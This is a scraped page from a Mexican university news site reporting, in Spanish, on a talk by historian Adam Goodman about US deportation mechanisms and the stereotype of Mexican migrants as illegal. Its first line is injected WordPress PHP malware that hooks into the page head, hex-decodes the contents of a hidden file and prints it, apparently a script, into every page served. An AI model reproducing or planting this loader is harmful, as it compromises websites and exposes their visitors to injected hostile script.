if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } México ha sido cómplice de la deportación masiva de EU: Académico IBERO – La Opinión Universitaria La Opinión Universitaria
Menu

México ha sido cómplice de la deportación masiva de EU: Académico IBERO

 

 

En la presentación realizada por el Instituto de Derechos Humanos Ignacio Ellacuría, SJ (IDHIE) de la IBERO Puebla en vinculación con el Departamento de Historia, la Maestría de Asuntos Migratorios de la IBERO Ciudad de México y la Coordinación Sistémica con Migrantes del Sistema Universitario Jesuita, el Dr. Goodman detalló que, en el último siglo, autoridades estadounidenses han deportado a más personas en comparación con el número de las que han recibido la residencia legal, a partir de lo cual se cuestiona el mito de Estados Unidos como una nación de inmigrantes.

 

En el libro, señaló su autor, se aborda la expulsión de migrantes desde tres mecanismos: la deportación formal, la salida voluntaria y la autodeportación. Estas últimas, dijo, han sido las menos abordadas en los estudios sobre migraciones.

 

Sobre la salida voluntaria, indicó, ha sido el mecanismo por el que se ha deportado a aproximadamente el 85% de las personas y consiste en expulsiones rápidas mediante decisiones administrativas cuando un agente detiene a un migrante irregular, siendo un mecanismo unilateral e implementado bajo amenazas para coaccionar a las personas a firmar los acuerdos. “Es la mejor opción de todas las malas opciones”.

 

Con relación a la autodeportación, el Dr. Goodman precisó que es un mecanismo que busca hacer la vida miserable de las personas migrantes, a través de redadas, campañas, leyes restrictivas, amenazas de uso de violencia y el uso de los medios de comunicación, lo que las orilla a abandonar el país de manera voluntaria.

 

Estereotipo de mexicano como migrante ilegal

Otro de los abordajes del libro del Dr. Adam Goodman es la creación del estereotipo de los migrantes mexicanos como migrantes ilegales.

 

Al respecto, el académico de la Universidad de Illinois Chicago puntualizó que, si bien las autoridades de Estados Unidos expulsan a personas de diferentes nacionalidades, se han concentrado particularmente en deportar mexicanos durante buena parte del siglo XX, reforzando el estereotipo como prototipo de migrantes “ilegales”, para así justificar el “tratamiento horrible” del que son víctimas.

 

Tweets recientes